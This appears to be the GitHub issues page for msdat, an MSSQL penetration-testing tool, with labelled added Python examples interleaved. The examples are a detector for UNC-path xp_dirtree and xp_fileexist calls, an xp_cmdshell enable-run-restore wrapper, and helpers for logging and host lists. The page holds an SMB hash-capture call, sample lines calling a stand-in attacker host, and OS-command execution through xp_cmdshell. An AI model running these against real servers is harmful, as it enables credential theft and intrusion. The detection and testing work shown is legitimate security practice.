
msdat's Issues

wordlist account format

What format of wordlist is accepted by passwordguesser?
In the example: sa/sa
What is the meaning? Thanks.

xp_cmdshell Run Specific Command

My team uses msdat non-interactively against a ton of machines using GNU's parallel command. It'd be nice if the xp_cmdshell module supported running a specific user-provided command such as whoami rather than prompting for an interactive session/command. Both options WOULD be nice to have. Having this feature would allow us to more easily test plenty of MSSQL servers rather than running one at a time.

xp_dirtree Incorrect Result

Hi, I am working through the HackTheBox machine, Escape, and I found that xp_dirtree was incorrectly reported as not supported.

I used impacket-mssqlclient and DBeaver to run exec xp_dirtree '\\#.#.#.#\share' which successfully connected to my Responder instance providing a NetNTLMv2 hash. The user I am using holds public access only.

Looking at the verbose comments, my guess is that this particular box does not have a C:\. I'll continue working and see if this box has a C:\ later on. What I find interesting is that the result was an empty list [], not a SQL error. I am no expert at SQL, but could we modify the xpdirectory module to check if [] was returned and not a SQL error?
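From the defender's side, the call reproduced above (a path-touching extended procedure handed a UNC path) is exactly what to alert on: the SQL Server service account is made to authenticate to an outside host. The following is an added example, not msdat's code and not part of the issue, that runs that check over statement-level log lines. The log line layout ("timestamp login=... stmt=...") and every sample line are constructed for the example; real deployments would feed it statement text from SQL Server Audit or Extended Events instead. The three procedures it watches are the ones msdat's SMBAuthenticationCapture module exercises (xp_dirtree, xp_fileexist, xp_getfiledetails); a call against a local drive such as C:\ is ordinary administration and is deliberately not flagged.

```python
import re
from typing import Dict, List

# Extended procedures that make the SQL Server service account touch a path.
# Given a UNC path they authenticate outbound to whatever host the path names.
PATH_XPS = ("xp_dirtree", "xp_fileexist", "xp_getfiledetails")

XP_CALL_RE = re.compile(r"\b(" + "|".join(PATH_XPS) + r")\b", re.IGNORECASE)
# A quoted argument beginning with two backslashes, e.g. '\\10.0.0.5\share'.
UNC_ARG_RE = re.compile(r"'(\\\\[^']+)'")
# Constructed log line layout: "<timestamp> login=<name> stmt=<T-SQL>".
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+login=(?P<login>\S+)\s+stmt=(?P<stmt>.*)$")


def extract_unc_targets(stmt: str) -> List[str]:
    """All UNC paths passed as string literals in the statement."""
    return UNC_ARG_RE.findall(stmt)


def unc_host(target: str) -> str:
    """Host part of a UNC path: two leading backslashes, then host, then share."""
    return target[2:].split("\\", 1)[0]


def analyse_statement(stmt: str) -> Dict:
    """Flag a statement only if it calls a path-touching xp AND hands it a UNC path.
    xp_dirtree on a local drive is routine administration and is left alone."""
    call = XP_CALL_RE.search(stmt)
    if not call:
        return {"suspicious": False}
    targets = extract_unc_targets(stmt)
    return {
        "suspicious": bool(targets),
        "procedure": call.group(1).lower(),
        "unc_targets": targets,
        "unc_hosts": sorted({unc_host(t) for t in targets}),
    }


def scan_log(lines) -> List[Dict]:
    """Run analyse_statement over log lines; one record per suspicious line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than alert on garbage
        result = analyse_statement(m.group("stmt"))
        if result["suspicious"]:
            hits.append({"ts": m.group("ts"), "login": m.group("login"), **result})
    return hits


# Constructed sample, not real audit output.
SAMPLE_LOG = [
    r"2024-05-01T10:00:00Z login=app_user stmt=SELECT name FROM sys.databases",
    r"2024-05-01T10:00:01Z login=app_user stmt=exec master..xp_dirtree 'C:\inetpub\wwwroot'",
    r"2024-05-01T10:00:02Z login=app_user stmt=EXEC xp_dirtree '\\10.0.0.5\share'",
    r"2024-05-01T10:00:03Z login=app_user stmt=exec xp_fileexist N'\\files.attacker.example\x\a.txt'",
    r"2024-05-01T10:00:04Z login=sa stmt=EXEC sp_configure 'xp_cmdshell', 1",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ts"], hit["login"], hit["procedure"], hit["unc_hosts"])
```

The unc_hosts field is the piece worth correlating: a host that is not one of your file servers, reached by a login that holds only public access, is the signal. Denying EXECUTE on these procedures to public (they are executable by public by default) removes the vector for low-privilege logins.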

xp_cmdshell Restore Service to Identified State

My team uses msdat non-interactively against a ton of machines using GNU's parallel command. We like to check and see if xp_cmdshell can be executed. Currently xp_cmdshell allows the user to enable or disable the xp. However, I'd like to be able to restore xp_cmdshell to how we found it so that I am not leaving xp_cmdshell enabled if it was already disabled on client environments.

So the breakdown would be:

  1. If xp_cmdshell is disabled and can be enabled:
    1. Enable
    2. Execute
    3. Disable
  2. If xp_cmdshell is enabled:
    1. Execute
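The breakdown above, implemented as an added example that is not msdat's code: a wrapper that snapshots the configuration, enables xp_cmdshell only when it is off, runs the command, and restores everything it changed in a finally block so the client is left as found even when the command itself fails. One detail the steps above omit: sp_configure refuses 'xp_cmdshell' unless 'show advanced options' is 1, so a faithful restore has to track that option too. The wrapper assumes only an execute(sql) callable that returns rows (a thin pymssql cursor wrapper in practice); the FakeInstance class is a constructed stand-in so the logic can be exercised offline, and its command output is made up.

```python
import re
from typing import Callable, Dict, List, Tuple

# Instance-level options involved. sp_configure only accepts 'xp_cmdshell' while
# 'show advanced options' is 1, so a faithful restore must track both.
OPTIONS = ("show advanced options", "xp_cmdshell")

# Standard T-SQL; value_in_use is the setting currently in effect.
Q_STATE = ("SELECT name, CAST(value_in_use AS int) FROM sys.configurations "
           "WHERE name IN ('show advanced options', 'xp_cmdshell')")
Q_SET = "EXEC sp_configure '{name}', {value}; RECONFIGURE;"
Q_RUN = "EXEC master..xp_cmdshell '{cmd}'"

# Anything that runs one statement and returns its rows, e.g. a pymssql wrapper.
Executor = Callable[[str], List[Tuple]]


def read_state(execute: Executor) -> Dict[str, int]:
    """Snapshot of the two options as the server reports them right now."""
    state = {str(name): int(value) for name, value in execute(Q_STATE)}
    missing = set(OPTIONS) - set(state)
    if missing:
        raise RuntimeError("could not read configuration: " + ", ".join(sorted(missing)))
    return state


def run_with_restore(execute: Executor, cmd: str) -> List[Tuple]:
    """Run cmd via xp_cmdshell, enabling it only if needed, and always put back
    whatever was changed, in reverse order, even if the command fails."""
    original = read_state(execute)
    changed: List[Tuple[str, int]] = []  # (option, value to restore)
    try:
        if original["xp_cmdshell"] == 0:
            if original["show advanced options"] == 0:
                execute(Q_SET.format(name="show advanced options", value=1))
                changed.append(("show advanced options", 0))
            execute(Q_SET.format(name="xp_cmdshell", value=1))
            changed.append(("xp_cmdshell", 0))
        return execute(Q_RUN.format(cmd=cmd.replace("'", "''")))
    finally:
        # xp_cmdshell goes back before 'show advanced options'; the other order
        # would have the second sp_configure rejected.
        for name, value in reversed(changed):
            execute(Q_SET.format(name=name, value=value))


class FakeInstance:
    """Constructed stand-in for a SQL Server instance so the wrapper runs offline.
    It enforces the one rule that matters here: xp_cmdshell cannot be configured
    while 'show advanced options' is 0."""

    def __init__(self, advanced: int, xp: int) -> None:
        self.config = {"show advanced options": advanced, "xp_cmdshell": xp}
        self.log: List[str] = []

    def execute(self, sql: str) -> List[Tuple]:
        self.log.append(sql)
        if sql == Q_STATE:
            return list(self.config.items())
        m = re.match(r"EXEC sp_configure '([^']+)', (\d); RECONFIGURE;$", sql)
        if m:
            name, value = m.group(1), int(m.group(2))
            if name == "xp_cmdshell" and self.config["show advanced options"] == 0:
                raise RuntimeError("'xp_cmdshell' is an advanced option")
            self.config[name] = value
            return []
        if sql.startswith("EXEC master..xp_cmdshell"):
            if self.config["xp_cmdshell"] == 0:
                raise RuntimeError("xp_cmdshell is disabled")
            return [("nt service\\mssqlserver",)]  # constructed command output
        raise ValueError("unexpected statement: " + sql)


def config_changes(instance: FakeInstance) -> int:
    """Number of sp_configure statements the wrapper issued against the fake."""
    return sum(s.startswith("EXEC sp_configure") for s in instance.log)


if __name__ == "__main__":
    server = FakeInstance(advanced=0, xp=0)
    print(run_with_restore(server.execute, "whoami"))
    print("restored:", server.config, "sp_configure calls:", config_changes(server))
```

Worth knowing for both sides of an engagement: every sp_configure change is written to the SQL Server error log, so even a correctly restored instance carries an enable/disable pair the client can review afterwards; the wrapper prevents leaving the option on, not leaving a trace.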

No module named pymssql

Hi there, could you please help me with this?
root@kali:/Downloads/mssql/msdat# ./msdat.py -h
Traceback (most recent call last):
  File "./msdat.py", line 10, in <module>
    from Mssql import Mssql
  File "/root/Downloads/mssql/msdat/Mssql.py", line 6, in <module>
    import pymssql, _mssql, decimal
ImportError: No module named pymssql
root@kali:/Downloads/mssql/msdat# pip3 install pymssql
Requirement already satisfied: pymssql in /usr/local/lib/python3.8/dist-packages (2.1.5)

Output/Log to File

I would like the tool to output results to file. Understanding this tool has many different modules, a standardized machine readable file type such as CSV may be difficult. However, having the tool output timestamps of actions and results would allow the tool to be run with persistent results. I see that something was started here, but was commented out:

#PPoutput.add_argument('--output-file',dest='outputFile',default=None,required=False,help='save results in this file')
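One way the commented-out option could be wired up, as an added example that is not msdat's code: the same --output-file argument feeding a logger that writes UTC-timestamped result lines to the console and, when the flag is given, to a file opened in append mode so repeated or parallel runs accumulate. The key=value line shape and the parse_result_line helper are my choice (the issue itself only asks for timestamps and results); the logger name and the sample host, module and outcome values are constructed for the example.

```python
import argparse
import logging
import sys
import time
from typing import Dict, Optional

LOGGER_NAME = "msdat.results"  # hypothetical; not a name the project uses
LINE_FORMAT = "%(asctime)s %(levelname)s %(message)s"
DATE_FORMAT = "%Y-%m-%dT%H:%M:%SZ"


def build_parser() -> argparse.ArgumentParser:
    parser = argparse.ArgumentParser(description="output-file example")
    parser.add_argument("--output-file", dest="outputFile", default=None,
                        required=False, help="save results in this file")
    return parser


def configure_output(output_file: Optional[str]) -> logging.Logger:
    """Console always; a file too when --output-file is given. Timestamps are
    UTC so results from a parallel run over many servers sort correctly."""
    logger = logging.getLogger(LOGGER_NAME)
    logger.setLevel(logging.INFO)
    logger.propagate = False
    for handler in list(logger.handlers):  # idempotent if called twice
        logger.removeHandler(handler)
        handler.close()
    formatter = logging.Formatter(LINE_FORMAT, datefmt=DATE_FORMAT)
    formatter.converter = time.gmtime
    console = logging.StreamHandler(sys.stdout)
    console.setFormatter(formatter)
    logger.addHandler(console)
    if output_file:
        file_handler = logging.FileHandler(output_file, mode="a", encoding="utf-8")
        file_handler.setFormatter(formatter)
        logger.addHandler(file_handler)
    return logger


def record_result(logger: logging.Logger, host: str, port: int, module: str,
                  outcome: str, detail: str = "") -> str:
    """One key=value line per (host, module) result; returns the message text."""
    message = "host=%s:%d module=%s result=%s" % (host, port, module, outcome)
    if detail:
        message += " detail=%s" % detail.replace("\n", "\\n")  # keep one line per result
    logger.info(message)
    return message


def parse_result_line(line: str) -> Dict[str, str]:
    """Inverse of record_result for a line read back from the file."""
    timestamp, level, rest = line.split(" ", 2)
    fields = {"timestamp": timestamp, "level": level}
    head, sep, detail = rest.partition(" detail=")
    for token in head.split(" "):
        key, _, value = token.partition("=")
        fields[key] = value
    if sep:
        fields["detail"] = detail  # free text, always last, may contain spaces
    return fields


if __name__ == "__main__":
    args = build_parser().parse_args()
    log = configure_output(args.outputFile)
    record_result(log, "10.0.0.5", 1433, "xpcmdshell", "enabled", "already on, not changed")
```

Keeping the free-text detail as the last field is what lets the line stay greppable and still be split back into fields; a CSV writer could be added as a second handler later without changing the call sites.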

Multiple Server Support

It would be cool if we added a flag such as -sL to run the intended module(s) against multiple servers at once. I am already wrapping msdat in a Bash script. This would be a line-delimited text file of servers rather than an nmap input file.

I see that multiple hosts are supported for password guessing:

PPpassguesser.add_argument('-l', dest='hostlist', required=False, help='filename which contains hosts (one ip on each line: "ip:port" or "ip" only)')
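The hostlist format quoted above ("ip:port" or "ip", one per line) is simple enough that a single parser could serve both the existing -l option and the proposed -sL flag. The following is an added example, not msdat's code: it accepts IPv4 addresses or hostnames, defaults the port to 1433, tolerates blank lines and '#' comments, rejects malformed ports and hosts with the line that caused it, and drops duplicates. The sample list is constructed. IPv6 literals are out of scope because the colon separator makes "ip:port" ambiguous for them.

```python
import ipaddress
import re
from typing import Iterable, List, Tuple

DEFAULT_PORT = 1433  # SQL Server default TCP port; named instances usually differ

# DNS-style hostname: labels of letters, digits and hyphens, not starting or
# ending with a hyphen. All-digit labels are allowed, so "10.0.0.999" would
# pass as a hostname; resolution, not parsing, catches that.
HOSTNAME_RE = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")


def parse_target(line: str, default_port: int = DEFAULT_PORT) -> Tuple[str, int]:
    """'ip' or 'ip:port' (IPv4 or hostname) -> (host, port); ValueError if malformed."""
    host, sep, port_text = line.rpartition(":")
    if not sep:
        host, port = line, default_port
    else:
        if not port_text.isdigit() or not 1 <= int(port_text) <= 65535:
            raise ValueError("bad port in %r" % line)
        port = int(port_text)
    try:
        ipaddress.IPv4Address(host)
    except ValueError:
        if not HOSTNAME_RE.match(host):
            raise ValueError("bad host in %r" % line)
    return host, port


def parse_hostlist(lines: Iterable[str],
                   default_port: int = DEFAULT_PORT) -> List[Tuple[str, int]]:
    """Blank lines and '#' comments are ignored; duplicates are dropped, first wins."""
    targets: List[Tuple[str, int]] = []
    seen = set()
    for raw in lines:
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        target = parse_target(line, default_port)
        if target not in seen:
            seen.add(target)
            targets.append(target)
    return targets


def load_hostlist(path: str) -> List[Tuple[str, int]]:
    """Read a hostlist file from disk."""
    with open(path, encoding="utf-8") as fh:
        return parse_hostlist(fh)


# Constructed sample; the trailing comment and the duplicate are deliberate.
SAMPLE_HOSTLIST = [
    "10.0.0.5",
    "10.0.0.6:1434   # named instance",
    "",
    "# lab database servers",
    "db01.corp.example",
    "10.0.0.5",
]

if __name__ == "__main__":
    for host, port in parse_hostlist(SAMPLE_HOSTLIST):
        print("%s:%d" % (host, port))
```

Failing fast with the offending line is the useful property for a batch run under parallel: a typo in one entry surfaces before any connection is attempted instead of appearing as one unexplained failure among hundreds of results.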

Project dependencies may have API risk issues

Hi, in msdat, inappropriate dependency versioning constraints can cause risks.

Below are the dependencies and version constraints that the project is using

cython
colorlog
termcolor
pymssql
argparse
python-libnmap
argcomplete

The version constraint == will introduce the risk of dependency conflicts because the scope of dependencies is too strict.
The version constraint No Upper Bound and * will introduce the risk of the missing API Error because the latest version of the dependencies may remove some APIs.

After further analysis, in this project,
The version constraint of dependency cython can be changed to ==3.0.0a10.
The version constraint of dependency colorlog can be changed to >=0.1,<=0.4.
The version constraint of dependency colorlog can be changed to >=1.4,<=1.8.
The version constraint of dependency colorlog can be changed to >=6.3.0a1,<=6.6.0.
The version constraint of dependency argparse can be changed to >=1.2.1,<=1.4.0.
The version constraint of dependency argcomplete can be changed to >=0.1.7,<=0.7.1.

The above modification suggestions can reduce the dependency conflicts as much as possible,
and introduce the latest version as much as possible without calling Error in the projects.

The invocation of the current project includes all the following methods.

The calling methods from the cython
queue.Queue
The calling methods from the colorlog
colorlog.ColoredFormatter
The calling methods from the argparse
argparse.ArgumentParser
argparse.ArgumentParser.parse_args
argparse.HelpFormatter
argparse.ArgumentParser.add_subparsers
The calling methods from the argcomplete
argcomplete.autocomplete
The calling methods from the all methods
iw.r.update
self.__saveThisLoginInFileIfNotExist__
self.args.close
Xpcmdshell.testAll
functools.reduce
next
LAST_RUN_OUTCOME.items
self.readFile
self.useThisDB
map
productVersion.append
self.tryToCaptureASmbAuthentication
search.searchInColumnNames.add_rows
argparse.ArgumentParser.testAll
self.nb.get
self.header
R_SHELL_COMMAND_POWERSHELL_PAYLOAD.format
marked_width.m.rjust
socket.socket.connect
MssqlInfo.__getRemoteVersionThroughSQLServerBrowser__
TrustworthyPE.testAll
os.popen.read.split
Jobs.getInteractiveReverseShell
self.REQ_EXEC_SYS_CMD.format
aRawData.base64.b64encode.decode.remoteFilePath.PS_CMD_WRITE_CREATE.format.replace.replace
Search
self.captureSMBAuthenticationViaXpDirtree
accounts.append
pymssql.connect
self.fd.write
join
Passwordstealer
self.getUsernamesViaSuserName
getHostsFromFile.append
self._splitit
self.REQ_OPENROWSET_REMOTE_CONNECTION.format
ScanPorts.scanAPort
socket.inet_aton
base64.b64encode
re.findall
bulkOpen.searchValideAccounts.append
self.reset
TrustworthyPE.TrustworthyPE.connect
BulkOpen.readFileViaOpenRowSet
self.REQ_READ_FILE.format
BulkOpen.remoteConnectionWithOpenrowset
self.__getUsernames__
Jobs.Jobs.testAll
Utils.generateUniqueName
math.ceil
self.writeFileBinary
_thread.exit
OleAutomation.putFile
bytes.fromhex
os.walk
usern.lower
hasattr
self.__getAnExampleOfValueForAColumn__
anAccount.startswith
threading.Thread.start
ports.split.append
self.set_chars
cells.append
self.args.execute
data.str.split
self.REQ_SMB_AUTHENTICATION_VIA_XP_FILEEXIST.format
self.isFileExistViaXpFileexist
XpDirectory.listFilesViaXpDirtree
logging.getLogger.setLevel
signal.signal
self.execSP
self.waitSomeSecs
self._check_align
XpDirectory.isFileExistViaXpFileexist
datetime.datetime.now.strftime
range
self.REQ_GET_COLUMNS_IN_TABLES.format
argparse.HelpFormatter
SMBAuthenticationCapture.captureSMBAuthenticationViaXpGetFileDetails
self.update
maxvalue.ETA.Bar.Percentage.ProgressBar.start
queue.Queue
repr
UsernameLikePassword.tryUsernameLikePassword
args.badNews
os.path.join
BulkOpen.closeConnection
isinstance
search.searchInColumnNames.draw
self.getJobs
self._compute_cols_width
Search.searchInColumnNames
PS_CMD_WRITE_CREATE.format
re.compile.match
usern.upper
self.REQ_USE_THIS_DB.format
marked_width.m.ljust
Jobs.testAll
XpDirectory.closeConnection
self.__getRemoteVersionThroughTDSResponse__
ScanPorts.scanAPort.start
currentFile.lower.endswith
threading.Thread.__init__
argparse.ArgumentParser.parse_args
re.compile.sub.extend
dict.badNews
Jobs.createAndExecuteJob
Utils.getStandardBarStarted
e.replace
argparse.ArgumentParser
self._has_border
logging.StreamHandler
Search.closeConnection
NC_CMD.format
self.marker.update
OleAutomation.OleAutomation
OleAutomation.getFile
self.stealHashedPasswords
self._format_marker
BulkOpen.readFileViaBulkinsert
strg.replace.replace
logging.StreamHandler.setFormatter
type
self.getCompleteVersion
os.popen
resultsToTable.append
ArraySizeError
self._hline
XpDirectory.testAll
anAccountIsGiven
fcntl.ioctl
getScreenSize
parser.parse_args.func
oleAutomation.putFile.encode
sorted
search.searchInColumnNames.count
runBulkInsertForGet
self.listDrivesViaXpAvailableMedia
datetime.datetime.now
runBulkInsertForRead
checkOptionsGivenByTheUser
BulkOpen
Utils.getPSReverseShellCodeEncoded
Passwordstealer.printPasswords
self.listDirectoriesViaXpSubdirs
self._build_hline
logging.info
Xpcmdshell.uploadFileWithPowershell
BulkOpen.searchValideAccounts
aRawData.base64.b64encode.decode
XpDirectory.createSubDiViaXpCreateSubdir
PasswordGuesser.searchValideAccounts
self.REQ_EXEC_SP_FOR_PE.format
max
ValueError
self.deleteSP
self._rows.append
self.__createJob__
self.readFileViaOpenRowSet
socket.socket.sendall
configureLogging
self.REQ_EXEC_JOB.format
OleAutomation.readFile
threading.Thread
UsernameLikePassword
argparse.ArgumentParser.add_subparsers
strg.replace
self.createAndExecuteJob
self._has_vlines.join
self.remoteConnectionWithOpenrowset
main
R_SHELL_COMMAND_POWERSHELL.format
MssqlInfo.returnPrintableStringFromDict
Percentage
ansi_keep.pop
self.__setJob__
self._has_hlines
parser.add_subparsers.add_parser
self._format_line
self.handle_resize
self.executeRequest
self.allUsernames.append
Search.isEmptyTable
re.compile.sub
Passwordstealer.stealHashedPasswords
self.__getJobStatusValue__
cleanString
pbar.percentage
time.time
format
Jobs.getJobStatus
argcomplete.autocomplete
BulkOpen.scanPortsWithOpenrowset
Jobs.printJobs
self._has_header
selectData.append
self.executeCmd
socket.socket
self.args.fetchall
Xpcmdshell.Xpcmdshell.testAll
struct.pack
self.tryPE
results.insert
self._len_cell
Utils.getScreenSize
range.append
Xpcmdshell.enableXpcmdshell
self.REQ_DROP_TABLE.format
texttable.Texttable.add_rows
getHostsFromFile
self.REQ_WRITE_FILE.format
OleAutomation.connect
enumerate
BulkOpen.getFileViaOpenRowSet
self.queueLock.acquire
self._check_row_size
OleAutomation.getInteractiveReverseShell
TrustworthyPE.TrustworthyPE
os.remove
self.OUTPUT_FORMAT_XP_DIRTREE.format
aHost.cleanString.split
self.VERSIONS.items
Passwordstealer.testAll
dict.bigTitle
self.__getAccounts__
self.nb.get.put
BulkOpen.disableAdHocDistributedQueries
self.getStandardBarStarted
anAccount.hex
print
self.args.title
Passwordstealer.closeConnection
self.__dropSysadminPriv__
self.captureSMBAuthenticationViaXpFileexist
texttable.Texttable.set_deco
self.isThe2005Version
pbar.update
SMBAuthenticationCapture.SMBAuthenticationCapture
strg.replace.replace.replace
re.compile
Xpcmdshell.closeConnection
socket.gethostbyname
utf16LEPayloadBytes.base64.b64encode.decode
MssqlInfo
list
self.getJobStatus
termcolor.colored
array.array
subparsers.add_parser.set_defaults
Mssql.Mssql
R_SHELL_COMMAND_POWERSHELL_PAYLOAD.format.encode
sys.exit
self.portStatusQueue.put
libnmap.parser.NmapParser.parse_fromfile
iter
runAllModules
self.output.printOSCmdOutput
PS_CMD_WRITE_APPEND.format
Mssql.Mssql.connect
Jobs
self.REQ_GET_COLUMNS_IN_VIEWS.format
values.append
self.REQ_XPCMDSHELL_CMD.format
open.write
self.__askToTheUserIfNeedToContinue__
UsernameLikePassword.runUsernameLikePassword
zip
line_wrapped.append
passwords.append
self.REQ_BULK_INSERT.format
anOperationHasBeenChosen
XpDirectory
runPasswordGuesserModuleOnAHost
Xpcmdshell.connect
str
Utils.ipOrNameServerHasBeenGiven
aRawData.base64.b64encode.decode.remoteFilePath.PS_CMD_WRITE_CREATE.format.replace
open
connectionInformation.keys
os.path.dirname
XpDirectory.connect
sys.stderr.write
Passwordstealer.Passwordstealer.testAll
TrustworthyPE.cleanPE
self.accounts.append
Exception.__init__
float
self.disableXpcmdshell
Jobs.Jobs
w.update
OleAutomation
Utils.databaseHasBeenGiven
OleAutomation.OleAutomation.testAll
Xpcmdshell.getInteractiveShell
texttable.Texttable
self.REQ_WRITE_FILE_BINARY.format
self.getRemoteDatabaseVersion
len
Utils.cleanString
Passwordstealer.Passwordstealer
self._str
dict
anAccount.endswith
self.REQ_XP_FILEEXIST.format
self.__dropTable__
args.title
Xpcmdshell.disableXpcmdshell
self.enableAdHocDistributedQueries
logging.getLogger
logging.critical
SMBAuthenticationCapture.captureSMBAuthenticationViaXpDirtree
SMBAuthenticationCapture.testAll
self.readFileViaBulkinsert
itertools.zip_longest
self.REQ_DROP_PRIV.format
OleAutomation.writeFile
portsQueue.join
int
SMBAuthenticationCapture.tryToCaptureASmbAuthentication
optik.textwrap.wrap
databases.append
currentFile.lower
Search.connect
args.goodNews
validAccountsList.items
r.append
Xpcmdshell.Xpcmdshell
time.strftime
ProgressBar
self.queueLock.release
self.__getRemoteVersionThroughSQLServerBrowser__
self.OUTPUT_MEDIA.format
self.isThe2012Version
open.read
self.REQ_STEP_JOB.format
input
self.disableAdHocDistributedQueries
PasswordGuesser.PasswordGuesser.searchValideAccounts
self.__searchPatternInColumnNamesOfViews__
SMBAuthenticationCapture
SMBAuthenticationCapture.SMBAuthenticationCapture.testAll
self.portsQueue.empty
input.lower
self.__searchPatternInColumnNamesOfTables__
OleAutomation.disableOLEAutomationProcedures
XpDirectory.XpDirectory
validAccounts.append
self.nb.put
socket.socket.recv
self.__createStoredProcToPE__
self.isCurrentUserSysadmin
self.format_time
self.__getPasswords__
TrustworthyPE.TrustworthyPE.testAll
argparse.ArgumentParser.add_argument
self.captureSMBAuthenticationViaXpGetFileDetails
self.createSubDiViaXpCreateSubdir
search.searchInColumnNames.set_deco
self._format_widgets
XpDirectory.listDrivesViaXpAvailableMedia
self.REQ_XP_CREATE_SUBDIR.format
self.__addJob__
OleAutomation.closeConnection
self.getCurrentUser
self.__isFileNotExist__
time.sleep
socket.socket.settimeout
OleAutomation.testAll
self.pbar.update
self.isThe2008Version
self.scannerObject.remoteConnectionWithOpenrowset
ScanPorts.ScanPorts.printScanPortResults
self.__execJob__
Utils.getBinaryDataFromFile
args.subtitle
BulkOpen.BulkOpen.testAll
self.REQ_CREATE_TABLE.format
runBulkInsertForGet.encode
socket.socket.sendto
ports.split
self.executeSysCmd
re.compile.sub.split
self.REQ_ADD_JOB.format
l.replace.replace.replace
self.__loadCompleteVersionIfNeed__
status.str.replace
BulkOpen.testAll
Xpcmdshell
args.unknownNews
portsQueue.put
l.cleanString.split
mssqlRawData.rfind
self._splitit.split
TrustworthyPE.isCurrentUserSysadmin
Utils.putDataToFile
self.__delJob__
hfill_inds.append
aRawData.base64.b64encode.decode.remoteFilePath.PS_CMD_WRITE_APPEND.format.replace
SMBAuthenticationCapture.captureSMBAuthenticationViaXpFileexist
self.REQ_GET_VALUE_IN_COLUMN.format
self.percentage
OleAutomation.executeSysCmd
PasswordGuesser.getHostsFromFile
self.__loadAllUsernames__
Output.Output
self.REQ_SMB_AUTHENTICATION_VIA_XP_GETFILEDETAILS.format
self.REQ_CREATE_JOB.format
self.add_row
open.readlines
self._hline_header
self.__getTrustworthyDBs__
aService.service.lower
Passwordstealer.connect
self.enableXpcmdshell
open.close
XpDirectory.listDrivesViaXpFixedDrives
ScanPorts.ScanPorts.scanTcpPorts
self._draw_line
BulkOpen.BulkOpen.closeConnection
threading.Lock
BulkOpen.enableAdHocDistributedQueries
self.REQ_SMB_AUTHENTICATION_VIA_XP_DIRTREE.format
self._format_widgets.join.ljust
self.args.cursor
self.REQ_XP_SUBDIRS.format
Bar
Utils.checkOptionsGivenByTheUser
logging.Formatter
self.args.unknownNews
OleAutomation.enableOLEAutomationProcedures
time.gmtime
validUsers.append
SMBAuthenticationCapture.connect
Utils.getCredentialsFormated
Jobs.connect
ScanPorts.ScanPorts
self.OUTPUT_DRIVES.format
self.__createTable__
self._need_update
struct.unpack
self.__getJobStatus__
database.connectionInformation.append
BulkOpen.BulkOpen
self.writeFile
UsernameLikePassword.connect
os.path.isfile
os.path.isdir
ansi_keep.append
self.REQ_XP_DIRTREE.format
dict.title
self.REQ_STORED_PROC_TO_SYSADMIN.format
dict.goodNews
logging.debug
self.args.badNews
MssqlInfo.__getRemoteVersionThroughTDSResponse__
os.path.abspath
self.isThe2000Version
self.REQ_GET_STATUS.format
dict.items
self.REQ_OPENROWSET.format
ipOrNameServerHasBeenGiven
XpDirectory.listDirectoriesViaXpSubdirs
BulkOpen.connect
certificateBasedSQLServerLogins.append
l.replace.replace
pbar.finish
self.REQ_READ_LINES.format
self.cleanPE
TrustworthyPE.tryPE
ports.isdigit
os.mkdir
self.isThe2014Version
self._has_vlines
self.enableOLEAutomationProcedures
Utils.cleanString.replace
runOpenRowSetForGet
self.listDrivesViaXpFixedDrives
Utils.ErrorClass
self.REQ_IS_A_VALID_USERNAME.format
logging.getLogger.addHandler
TrustworthyPE.connect
TrustworthyPE
input.replace
ETA
parser.parse_args._get_kwargs
self.REQ_DEL_PROC.format
f.read.encode
self.REQ_DEL_JOB.format
random.randrange
list.extend
self.args.autocommit
cleanList.append
self.args.goodNews
aDictionary.items
aRawData.base64.b64encode.decode.remoteFilePath.PS_CMD_WRITE_APPEND.format.replace.replace
logging.warning
self.listFilesViaXpDirtree
self.args.subtitle
self.portsQueue.get
self.__getProductNameFromVersion__
BulkOpen.getFileViaBulkinsert
PasswordGuesser
self.REQ_GET_USERNAME.format
x.encode
askToContinue
colorlog.ColoredFormatter
SMBAuthenticationCapture.closeConnection
logging.error
iterable.__len__
Mssql.Mssql.__init__
runOpenRowSetForRead
PasswordGuesser.PasswordGuesser
self.portsQueue.task_done
os.popen.read
Mssql.Mssql.closeConnection
Passwordstealer.credentialsAreEmpty
texttable.Texttable.draw
usernames.append
subprocess.call

@developer
Could you please help me check this issue?
May I pull a request to fix it?
Thank you very much.

License

Hello, my employer would like to use your code as a part of our penetration tests. Not to distribute, but use. Could you add an appropriate license to allow this OR at least provide a license to clarify your software usage? Thanks!
